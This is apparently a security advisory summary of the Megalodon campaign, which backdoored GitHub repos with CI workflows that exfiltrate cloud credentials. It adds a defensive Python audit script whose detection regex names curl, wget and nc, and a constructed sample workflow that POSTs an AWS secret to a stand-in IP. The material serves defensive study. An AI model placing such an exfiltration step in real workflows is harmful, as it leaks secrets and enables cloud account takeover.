Megalodon: Mass GitHub Repo Backdooring via CI Workflows
Disclosure of a critical campaign that backdoored GitHub repos at scale via injected CI workflows.
In the Megalodon campaign, an attacker pushed 5,718 malicious commits across 5,561 GitHub repos in six hours, forging committer identities such as `build-bot` to inject GitHub Actions workflows. The mass variant (`SysDiag`) triggers on every push and pull request, while the targeted variant (`Optimize-Build`) uses `workflow_dispatch` for on-demand exfiltration of secrets (AWS/GCP/Azure credentials, OIDC tokens, and SSH keys) to a C2 server at 216.126.225.129:8443. The attack spread via compromised Tiledesk npm package versions 2.18.6–2.18.12; the compromise originated in the legitimate maintainer's GitHub repo, not in the npm account.
- Audit all GitHub Actions workflow permissions (especially `id-token: write`) and pin CI dependency versions to detect injection attacks like Megalodon.
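As an added example (not from the report and not safedep's tooling), a heuristic Python audit of one workflow file for the signals described above: an `id-token: write` permission, a `workflow_dispatch` trigger, actions not pinned to a full commit SHA, secret references, and network tools aimed at a bare IP. The sample workflow is constructed, and 203.0.113.10 is a documentation address standing in for a real C2.

```python
"""Heuristic audit of GitHub Actions workflow text for Megalodon-style risk signals."""
import re
from typing import Dict, List

SUSPICIOUS_NAMES = ("sysdiag", "optimize-build", "build-bot")  # names from the summary
USES_REF = re.compile(r"^\s*-?\s*uses:\s*(\S+)", re.M)
SHA_PINNED = re.compile(r"@[0-9a-f]{40}$")
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)\s*\}\}")
RAW_IP_EGRESS = re.compile(r"\b(?:curl|wget|nc|ncat)\b[^\n]*\b\d{1,3}(?:\.\d{1,3}){3}\b")

def audit_workflow(text: str) -> Dict[str, List[str]]:
    """Return finding-category -> details for the text of one workflow file."""
    findings: Dict[str, List[str]] = {}
    def add(key: str, detail: str) -> None:
        findings.setdefault(key, []).append(detail)
    # The permission that lets a job mint OIDC tokens and assume cloud identity.
    if re.search(r"^\s*id-token:\s*write\b", text, re.M):
        add("id-token-write", "job can mint OIDC tokens")
    # On-demand trigger: the targeted variant ran secret exfiltration this way.
    if re.search(r"^\s*workflow_dispatch\s*:", text, re.M):
        add("manual-trigger", "workflow_dispatch")
    # Actions not pinned to a full commit SHA can change under the workflow.
    for m in USES_REF.finditer(text):
        ref = m.group(1)
        if not ref.startswith("./") and not SHA_PINNED.search(ref):
            add("unpinned-action", ref)
    for m in SECRET_REF.finditer(text):
        add("secret-reference", m.group(1))
    for m in RAW_IP_EGRESS.finditer(text):
        add("raw-ip-egress", m.group(0))
    lowered = text.lower()
    for name in SUSPICIOUS_NAMES:
        if name in lowered:
            add("suspicious-name", name)
    return findings

# Constructed sample of the described pattern; 203.0.113.10 is a TEST-NET-3
# documentation address standing in for a real C2, not the one in the report.
MALICIOUS_SAMPLE = """name: Optimize-Build
on:
  workflow_dispatch:
permissions:
  id-token: write
jobs:
  build:
    steps:
      - uses: actions/checkout@v4
      - run: curl -X POST https://203.0.113.10:8443/ -d "${{ secrets.AWS_SECRET_ACCESS_KEY }}"
"""
```

Run it over every file under `.github/workflows/` in a checkout; an empty dict means none of the heuristics fired, which is a starting point for review rather than a clean bill of health.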
For a platform/cloud engineer managing CI/CD and open-source dependencies, this attack demonstrates a critical supply chain vector where compromised GitHub repos inject malicious workflows that can exfiltrate cloud credentials and OIDC tokens, enabling full cloud identity impersonation.
safedepio